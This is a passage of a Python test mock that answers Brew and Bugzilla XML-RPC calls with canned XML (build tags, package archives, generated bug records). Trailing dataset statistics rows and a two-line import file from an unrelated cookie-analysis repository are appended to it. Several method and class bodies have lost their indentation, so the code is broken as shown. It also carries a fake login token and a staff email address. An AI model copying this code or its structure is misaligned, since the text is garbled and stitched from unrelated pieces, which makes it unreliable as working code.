    if numstr.isdigit():
        num = int(numstr)
    for k in range(num * 20):
        i = k % 20
        # Explicit floor division; py2 int `/` already floored, py3 would not.
        p = k // 20
        pckg = prix[p] + pckgs[i]
        payloadhash = str(uuid.uuid1()).replace('-', '')
        buildroot_id = buildroot_id + buildRoot[i]
        nvr_id = nvr_id + 1
        dataBlock = "".join([dataBlock,"<value><struct><member><name>build_id</name><value><int>",str(dynData.get("id")),
            "</int></value></member><member><name>nvr</name><value><string>",pckg,"-",dynData['version'],"-",
            dynData['release'],"</string></value></member><member><name>buildroot_id</name><value><int>",str(buildroot_id),
            "</int></value></member><member><name>buildtime</name><value><int>1398348462</int></value></member><member><name>payloadhash</name><value><string>",
            payloadhash,"</string></value></member><member><name>epoch</name><value><nil/></value></member><member><name>version</name><value><string>",
            dynData.get("version"),"</string></value></member><member><name>external_repo_id</name><value><int>0</int></value></member><member><name>release</name><value><string>",
            dynData.get("release"),"</string></value></member><member><name>size</name><value><int>48700</int></value></member><member><name>arch</name><value><string>",
            archs[i],"</string></value></member><member><name>id</name><value><int>",str(nvr_id),
            "</int></value></member><member><name>external_repo_name</name><value><string>INTERNAL</string></value></member><member><name>name</name><value><string>",
            pckg,"</string></value></member></struct></value>"])
    response = "".join([dataBlock,'</data></array></value></param></params></methodResponse>'])
    response = response.replace('libwacom', dynData['name'])
    return response
@staticmethod
def listTags(request):
    """Mock Brew listTags: a fixed set of RHEL-6.6 tags.

    The maven_support / maven_include_all booleans are driven by the
    configured build_type: any type that does not mention 'rpm' is treated
    as maven-capable.  (A stale hard-coded copy of this response was
    removed; the template below with ${isMaven} placeholders is the live
    one.)
    """
    global paramSettings
    if ('build_type' in paramSettings and paramSettings.get('build_type').count('rpm') == 0):
        isMaven = "1"
    else:
        isMaven = "0"
    response = "<?xml version='1.0' encoding='utf-8'?><methodResponse><params><param><value><array><data><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-pending</string></value></member><member><name>perm</name><value><string>trusted</string></value></member><member><name>id</name><value><int>5533</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><int>6</int></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-override</string></value></member><member><name>perm</name><value><string>trusted</string></value></member><member><name>id</name><value><int>5536</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><int>6</int></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-internal-compose-1.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6386</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-alpha-1.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6456</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-beta-1.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6572</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-snapshot-1.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6658</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-snapshot-2.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6671</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value></data></array></value></param></params></methodResponse>"
    response = response.replace('${isMaven}', isMaven)
    return response
@staticmethod
def listArchives(request):
    """Mock Brew listArchives: dispatch to the maven/image/win variant.

    The archive type is the 5th positional parameter of the XML-RPC
    request; it must also match the configured build_type, otherwise an
    empty result set is returned.
    """
    global paramSettings
    archive_type = xmlrpclib.loads(request)[0][4]  # renamed from `type` (shadowed builtin)
    if paramSettings is None:
        # Default configuration when setParams was never called.
        # BUGFIX: the original stored the whole loads()-shaped tuple
        # (({'build_type': 'maven'},), 'setParams') here, so the dict
        # lookups below raised AttributeError; store just the params dict,
        # matching what setParams extracts (requestRPC[0][0]).
        paramSettings = {'build_type': 'maven'}
    if 'build_type' in paramSettings:
        if (archive_type.count('maven') > 0 and paramSettings.get('build_type').count('maven') > 0):
            return BrewHubMock.listArchives_maven(request)
        elif (archive_type.count('image') > 0 and paramSettings.get('build_type').count('image') > 0):
            return BrewHubMock.listArchives_image(request)
        elif (archive_type.count('win') > 0 and paramSettings.get('build_type').count('win') > 0):
            return BrewHubMock.listArchives_win(request)
    return BrewHubMock.respondNone(request)
# if type is NON-RPM packages: image archives
@staticmethod
def listArchives_image(request):
    """Mock listArchives for image builds.

    Emits one XML-file archive <struct> per entry (20 per name prefix,
    scaled by a digit in the build name) and substitutes the real build
    name for the 'libwacom' template.  Advances the module-level nvr_id
    counter; unlike the RPM variant, buildroot_id is reported as <nil/>
    and the buildroot counter is left untouched.
    """
    global nvr_id
    archs = ["s390x","s390x","s390x","i686","i686","i686","ppc64","ppc64","ppc64","x86_64","x86_64","x86_64","s390","s390","s390","ppc","noarch","ppc","ppc","src"]
    pckgs = ["libwacom-debuginfo","libwacom-devel","libwacom","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-debuginfo","libwacom","libwacom-devel","libwacom-debuginfo","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-data","libwacom","libwacom-devel","libwacom"]
    dataBlock = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><array><data>"
    prix = ['','aa', 'bb', 'cc','dd','ee','ff','gg']
    num = 1
    numstr = dynData['name'][1:2]
    if numstr.isdigit():
        num = int(numstr)
    for k in range(num * 20):
        i = k % 20
        # Explicit floor division; py2 int `/` already floored, py3 would not.
        p = k // 20
        pckg = prix[p] + pckgs[i]
        payloadhash = str(uuid.uuid1()).replace('-', '')
        nvr_id = nvr_id + 1
        dataBlock = "".join([dataBlock,"<value><struct><member><name>build_id</name><value><int>",str(dynData.get("id")),
            "</int></value></member><member><name>type_description</name><value><string>XML file</string></value></member><member><name>type_id</name><value><int>5</int></value></member><member><name>checksum</name><value><string>",
            payloadhash,"</string></value></member><member><name>type_name</name><value><string>xml</string></value></member><member><name>filename</name><value><string>",
            pckg,"-",dynData['version'],"-",dynData['release'],"</string></value></member><member><name>arch</name><value><string>",
            archs[i],"</string></value></member><member><name>type_extensions</name><value><string>xml</string></value></member><member><name>checksum_type</name><value><int>0</int></value></member><member><name>buildroot_id</name><value><nil/></value></member><member><name>id</name><value><int>",
            str(nvr_id),"</int></value></member><member><name>size</name><value><int>641</int></value></member></struct></value>"])
    response = "".join([dataBlock,'</data></array></value></param></params></methodResponse>'])
    response = response.replace('libwacom', dynData['name'])
    return response
# if type is NON-RPM packages: maven archives
@staticmethod
def listArchives_maven(request):
    """Mock listArchives for maven builds.

    Emits one maven artifact <struct> per entry (20 per name prefix,
    scaled by a digit in the build name); the 'com.jboss.eap' group id
    template is finally replaced with the real build name.  Advances the
    module-level buildroot_id and nvr_id counters as a side effect.
    """
    global buildroot_id
    global nvr_id
    artifact_ids = ["jboss-eap-parent","com.jboss.eap","jboss-eap-parent","jboss-eap","jboss-eap",
        "jboss-eap","jboss-eap","jboss-eap","jboss-eap-a","jboss-eap-b","jboss-eap-c","jboss-eap-d",
        "jboss-eap-e","jboss-eap-f","jboss-eap-g","jboss-eap-h","jboss-eap-i","jboss-eap-j","jboss-eap-k","jboss-eap-build"]
    prexNames = ['-sources.zip','-patches.zip','.pom','-src.tar.gz','.tar.gz','.pom','.zip','.tar.gz','.tar.gz',
        '.tar.gz','.tar.gz','.tar.gz','.tar.gz','.tar.gz','.tar.gz','.tar.gz','.tar.gz','.tar.gz','.tar.gz','.pom']
    buildRoot = [1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0]
    dataBlock = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><array><data>"
    prix = ['','aa', 'bb', 'cc','dd','ee','ff','gg']
    num = 1
    numstr = dynData['name'][1:2]
    if numstr.isdigit():
        num = int(numstr)
    for k in range(num * 20):
        i = k % 20
        # Explicit floor division; py2 int `/` already floored, py3 would not.
        p = k // 20
        artifact_id = prix[p] + artifact_ids[i]
        payloadhash = str(uuid.uuid1()).replace('-', '')
        buildroot_id = buildroot_id + buildRoot[i]
        filename = ''.join([artifact_id,"-",dynData.get("version"),prexNames[i]])
        nvr_id = nvr_id + 1
        dataBlock = "".join([dataBlock,"<value><struct><member><name>build_id</name><value><int>",
            str(dynData.get("id")),"</int></value></member><member><name>type_description</name><value><string>Jar file</string></value></member><member><name>artifact_id</name><value><string>",
            artifact_id,"</string></value></member><member><name>type_id</name><value><int>2</int></value></member><member><name>checksum</name><value><string>",
            payloadhash,"</string></value></member><member><name>type_name</name><value><string>zip</string></value></member><member><name>filename</name><value><string>",
            filename,"</string></value></member><member><name>version</name><value><string>",
            dynData.get("version"),"</string></value></member><member><name>type_extensions</name><value><string>zip</string></value></member><member><name>checksum_type</name><value><int>0</int></value></member><member><name>group_id</name><value><string>com.jboss.eap</string></value></member><member><name>buildroot_id</name><value><int>",
            str(buildroot_id),"</int></value></member><member><name>id</name><value><int>",str(nvr_id),"</int></value></member><member><name>size</name><value><int>89428632</int></value></member></struct></value>"])
    response = "".join([dataBlock,'</data></array></value></param></params></methodResponse>'])
    response = response.replace('com.jboss.eap', dynData['name'])
    return response
# if type is NON-RPM packages: win archives
@staticmethod
def listArchives_win(request):
    """Windows builds are not modelled: always answer with an empty archive list."""
    empty_response = BrewHubMock.respondNone(request)
    return empty_response
#return nothing
@staticmethod
def respondNone(request):
response = "<?xml version='1.0'?><methodResponse><params><param><value><array><data></data></array></value></param></params></methodResponse>"
return response
# only for setting some parameters
@staticmethod
def setParams(request):
    """Decode an XML-RPC setParams request and stash its first argument
    (a dict of settings) in the module-level paramSettings."""
    global paramSettings
    decoded = xmlrpclib.loads(request)
    paramSettings = decoded[0][0]
    # Echo the raw request back; callers of the mock ignore this payload.
    return request
class BugzillaMock():
# Shared mutable state for the Bugzilla mock.  NOTE: these `global`
# statements execute in the class body, so the assignments below bind the
# names at *module* level — all handlers share and mutate them.
global bugid, bugid_init # bugid
global compid # component id which is related to bugid
global flagid # flag id
global component_id
global component_id_id
global release
global product
global releaseCompNum
# Seed values; the Bug_* handlers increment bugid/flagid per generated bug.
bugid = 1210000
compid = 1
flagid=2010000
# Alternative seed values, kept commented out for manual experiments.
#bugid = 1220000
#compid = 1000
#flagid = 2010000 + 20000*4
component_id=144320
component_id_id = 810000
# Release flag name and product string used in the canned responses.
release = "rhel-7.1.0"
product = "Red Hat Enterprise Linux 7"
bugid_init = bugid # remembered so offsets from the first bug can be computed
releaseCompNum = 1500 # presumably the component count per release — not used in this chunk; verify
@staticmethod
def callMethod(requestData, methodName):
    """Dispatch an XML-RPC method name (dots mapped to underscores, e.g.
    'Bug.get' -> Bug_get) to the matching mock handler."""
    handler = getattr(BugzillaMock, methodName.replace('.', '_'))
    return handler(requestData)
@staticmethod
def User_login(request):
response = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><methodResponse><params><param><value><struct><member><name>id</name><value><int>241731</int></value></member><member><name>token</name><value><string>241731-Pqde868rmU</string></value></member></struct></value></param></params></methodResponse>"
return response
@staticmethod
def Bug_get1(request):
    """Mock Bugzilla Bug.get for a single MODIFIED bug.

    Fills the ${bugid}/${component}/${release} placeholders of the canned
    response, then advances the module-level bugid and flagid counters.
    Note the three ack flags all reuse id flagid+1 — kept as-is (test data).
    """
    global bugid
    global compid
    global flagid
    global release
    # NOTE(review): the 1200000 base differs from bugid's 1210000 seed
    # (Bug_get2 uses 1210000) — presumably intentional test data; verify.
    # `//` keeps the py2 int-division behavior explicit and py3-safe.
    component = "testcomponent_" + str(compid + (bugid - 1200000) // 10)
    response = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>faults</name><value><array><data/></array></value></member><member><name>bugs</name><value><array><data><value><struct><member><name>priority</name><value><string>low</string></value></member><member><name>status</name><value><string>MODIFIED</string></value></member><member><name>last_change_time</name><value><dateTime.iso8601>20140822T15:40:36</dateTime.iso8601></value></member><member><name>keywords</name><value><array><data/></array></value></member><member><name>cf_qa_whiteboard</name><value><string/></value></member><member><name>summary</name><value><string>bug_${component}_1408722027952</string></value></member><member><name>groups</name><value><array><data/></array></value></member><member><name>id</name><value><int>${bugid}</int></value></member><member><name>severity</name><value><string>low</string></value></member><member><name>flags</name><value><array><data><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>245</int></value></member><member><name>name</name><value><string>${release}</string></value></member><member><name>id</name><value><int>" + str(flagid) + "</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>11</int></value></member><member><name>name</name><value><string>pm_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>10</int></value></member><member><name>name</name><value><string>devel_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>9</int></value></member><member><name>name</name><value><string>qa_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value></data></array></value></member><member><name>cf_pm_score</name><value><string>0</string></value></member><member><name>component</name><value><array><data><value><string>${component}</string></value></data></array></value></member><member><name>classification</name><value><string>Red Hat</string></value></member><member><name>product</name><value><string>Red Hat Enterprise Linux 7</string></value></member><member><name>cf_release_notes</name><value><string/></value></member><member><name>cf_verified</name><value><array><data/></array></value></member><member><name>alias</name><value><array><data/></array></value></member></struct></value></data></array></value></member></struct></value></param></params></methodResponse>"
    response = response.replace('${bugid}', str(bugid))
    response = response.replace('${component}', component)
    response = response.replace('${release}', release)
    bugid = bugid + 1
    flagid = flagid + 1
    return response
@staticmethod
def Bug_get2(request):
    """Mock Bugzilla Bug.get returning a batch of 100 NEW bugs.

    Each entry's ${bugid}/${component}/${release} placeholders are filled
    with that entry's own values; bugid and flagid advance by one per bug,
    and every run of 10 consecutive bugs shares one component name.
    """
    global bugid
    global compid
    global flagid
    global release
    prebody = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>faults</name><value><array><data/></array></value></member><member><name>bugs</name><value><array><data>"
    body = ""
    endbody = "</data></array></value></member></struct></value></param></params></methodResponse>"
    for i in range(100):
        part = "<value><struct><member><name>priority</name><value><string>low</string></value></member><member><name>status</name><value><string>NEW</string></value></member><member><name>last_change_time</name><value><dateTime.iso8601>20140822T15:40:36</dateTime.iso8601></value></member><member><name>keywords</name><value><array><data/></array></value></member><member><name>cf_qa_whiteboard</name><value><string/></value></member><member><name>summary</name><value><string>bug_${component}_1408722027952</string></value></member><member><name>groups</name><value><array><data/></array></value></member><member><name>id</name><value><int>${bugid}</int></value></member><member><name>severity</name><value><string>low</string></value></member><member><name>flags</name><value><array><data><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>245</int></value></member><member><name>name</name><value><string>${release}</string></value></member><member><name>id</name><value><int>" + str(flagid) + "</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>11</int></value></member><member><name>name</name><value><string>pm_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>10</int></value></member><member><name>name</name><value><string>devel_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>9</int></value></member><member><name>name</name><value><string>qa_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value></data></array></value></member><member><name>cf_pm_score</name><value><string>0</string></value></member><member><name>component</name><value><array><data><value><string>${component}</string></value></data></array></value></member><member><name>classification</name><value><string>Red Hat</string></value></member><member><name>product</name><value><string>Red Hat Enterprise Linux 7</string></value></member><member><name>cf_release_notes</name><value><string/></value></member><member><name>cf_verified</name><value><array><data/></array></value></member><member><name>alias</name><value><array><data/></array></value></member></struct></value>"
        # Ten consecutive bugs share one component name ('//' keeps the py2
        # int-division behavior explicit and py3-safe).
        component = "testcomponent_" + str(compid + (bugid - 1210000) // 10)
        # BUGFIX: substitute into the entry just built.  The original code
        # replaced placeholders in the accumulated `body` *before* appending
        # `part`, so each entry was filled with the NEXT bug's ids and the
        # final entry was emitted with its ${...} placeholders unexpanded.
        part = part.replace('${bugid}', str(bugid))
        part = part.replace('${component}', component)
        part = part.replace('${release}', release)
        body = "".join([body, part])
        bugid = bugid + 1
        flagid = flagid + 1
    response = prebody + body + endbody
    return response
# Each component contains 20 bugs: the first 10 of every 20 (status
# MODIFIED) are eligible, the following 10 (status NEW) are ineligible.
@staticmethod
def Bug_get(request):
    """Return a canned Bugzilla ``Bug.get`` XML-RPC response with 100 bugs.

    Relies on (and advances) the module-level counters: ``bugid``/``bugid_init``
    drive the bug ids, ``compid`` is the component-id base, ``flagid`` the flag
    ids, and ``release`` names the release flag.  The ``request`` payload is
    ignored; the response is a fixed template filled per bug.
    """
    global bugid, bugid_init
    global compid
    global flagid
    global release
    prebody = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>faults</name><value><array><data/></array></value></member><member><name>bugs</name><value><array><data>"
    body = ""
    endbody = "</data></array></value></member></struct></value></param></params></methodResponse>"
    for i in range(100):
        # First 10 of each block of 20 are eligible (MODIFIED), rest NEW.
        status = 'MODIFIED'
        if i % 20 >= 10:
            status = 'NEW'
        # NOTE(review): pm_ack/devel_ack/qa_ack all reuse str(flagid+1); this
        # may have been intended as +1/+2/+3 — confirm before relying on ids.
        part = "<value><struct><member><name>priority</name><value><string>low</string></value></member><member><name>status</name><value><string>"+status+ "</string></value></member><member><name>last_change_time</name><value><dateTime.iso8601>20140822T15:40:36</dateTime.iso8601></value></member><member><name>keywords</name><value><array><data/></array></value></member><member><name>cf_qa_whiteboard</name><value><string/></value></member><member><name>summary</name><value><string>bug_${component}_1408722027952</string></value></member><member><name>groups</name><value><array><data/></array></value></member><member><name>id</name><value><int>${bugid}</int></value></member><member><name>severity</name><value><string>low</string></value></member><member><name>flags</name><value><array><data><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>245</int></value></member><member><name>name</name><value><string>${release}</string></value></member><member><name>id</name><value><int>"+ str(flagid) + "</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>11</int></value></member><member><name>name</name><value><string>pm_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>10</int></value></member><member><name>name</name><value><string>devel_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>9</int></value></member><member><name>name</name><value><string>qa_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value></data></array></value></member><member><name>cf_pm_score</name><value><string>0</string></value></member><member><name>component</name><value><array><data><value><string>${component}</string></value></data></array></value></member><member><name>classification</name><value><string>Red Hat</string></value></member><member><name>product</name><value><string>Red Hat Enterprise Linux 7</string></value></member><member><name>cf_release_notes</name><value><string/></value></member><member><name>cf_verified</name><value><array><data/></array></value></member><member><name>alias</name><value><array><data/></array></value></member></struct></value>"
        # 20 consecutive bug ids share one component (// keeps Python 2's
        # integer-division semantics; the original C-style (int)(...)/20 did
        # the same only under Python 2).
        component = "testcomponent_" + str(compid + int(bugid - bugid_init) // 20)
        # Fill the placeholders in *this* fragment before appending it.  The
        # previous code ran replace() on the accumulated body instead, which
        # substituted the prior iteration's values and left the last
        # fragment's ${bugid}/${component}/${release} unreplaced.
        part = part.replace('${bugid}', str(bugid))
        part = part.replace('${component}', component)
        part = part.replace('${release}', release)
        body = "".join([body, part])
        bugid = bugid + 1
        flagid = flagid + 1
    response = prebody + body + endbody
    return response
# Sync with the errata tool; this only changes the rhel-7.1.0 ACL.
@staticmethod
def Releases_getReleaseComponents(request):
    """Return a canned ``getReleaseComponents`` XML-RPC response.

    Grows the module-level ``releaseCompNum`` by 500 on every call, then emits
    that many ``testcomponent_N`` entries, duplicated into the ``nack``,
    ``approved`` and ``ack`` arrays, plus an empty ``capacity`` array.  The
    ``request`` payload is ignored.
    """
    global releaseCompNum
    releaseCompNum = releaseCompNum + 500
    comp_index = 1
    bz_component_id = 144320
    record_id = 810000
    prebody_all = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><methodResponse><params><param><value><struct>"
    endbody_all = "</struct></value></param></params></methodResponse>"
    print(releaseCompNum)
    # Build each component entry once; the same body is reused verbatim for
    # the nack / approved / ack sections below.
    entries = []
    for _ in range(releaseCompNum):
        component = "testcomponent_" + str(comp_index)
        entries.append("".join(["<value><struct><member><name>initialowner</name><value><string>zxiong@redhat.com</string></value></member><member><name>name</name><value><string>",component,"</string></value></member><member><name>type</name><value><string>approved</string></value></member><member><name>product</name><value><string>Red Hat Enterprise Linux 7</string></value></member><member><name>component_id</name><value><int>",str(bz_component_id),"</int></value></member><member><name>id</name><value><int>",str(record_id),"</int></value></member><member><name>initialqacontact</name><value><string>zxiong@redhat.com</string></value></member></struct></value>"]))
        bz_component_id = bz_component_id + 1
        record_id = record_id + 1
        comp_index = comp_index + 1
    body = "".join(entries)
    prebody1 = "<member><name>nack</name><value><array><data>"
    prebody2 = "<member><name>approved</name><value><array><data>"
    prebody3 = "<member><name>ack</name><value><array><data>"
    endbody = "</data></array></value></member>"
    allbody = prebody1 + body + endbody + prebody2 + body + endbody + prebody3 + body + endbody + "<member><name>capacity</name><value><array><data/></array></value></member>"
    response = prebody_all + allbody + endbody_all
    return response
@staticmethod
def resetReleaseComponentNum(request):
    """Reset the module-level component count from an XML-RPC request body."""
    global releaseCompNum
    # xmlrpclib.loads returns (params, methodname); the count is params[0].
    params = xmlrpclib.loads(request)[0]
    releaseCompNum = int(params[0])
    return "The number of Components: " + str(releaseCompNum)
| 124.805944
| 4,514
| 0.65017
| 9,168
| 71,389
| 5.014834
| 0.041558
| 0.113538
| 0.15308
| 0.189099
| 0.904298
| 0.891226
| 0.88096
| 0.869584
| 0.85984
| 0.852249
| 0
| 0.037151
| 0.100744
| 71,389
| 571
| 4,515
| 125.024518
| 0.679019
| 0.073555
| 0
| 0.607059
| 0
| 0.141176
| 0.739834
| 0.690851
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.011765
| null | null | 0.004706
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
f1a79661dfa55b1e78cf665533a48bb94e7fea21
| 71
|
py
|
Python
|
CookieAnalysis/__init__.py
|
D-E-F-E-A-T/Cookie-Analyzer-and-Session-Hijack
|
97a1ce1c56c3962f57754c60d46a75fe68715c54
|
[
"MIT"
] | 2
|
2020-01-13T13:51:33.000Z
|
2020-01-17T21:58:10.000Z
|
CookieAnalysis/__init__.py
|
D-E-F-E-A-T/Cookie-Analyzer-and-Session-Hijack
|
97a1ce1c56c3962f57754c60d46a75fe68715c54
|
[
"MIT"
] | 3
|
2020-01-09T19:25:22.000Z
|
2020-01-13T16:06:45.000Z
|
CookieAnalysis/__init__.py
|
D-E-F-E-A-T/Cookie-Analyzer-and-Session-Hijack
|
97a1ce1c56c3962f57754c60d46a75fe68715c54
|
[
"MIT"
] | null | null | null |
from CookieAnalysis import wrapper
from CookieAnalysis import analysis
| 23.666667
| 35
| 0.887324
| 8
| 71
| 7.875
| 0.625
| 0.571429
| 0.761905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 71
| 2
| 36
| 35.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
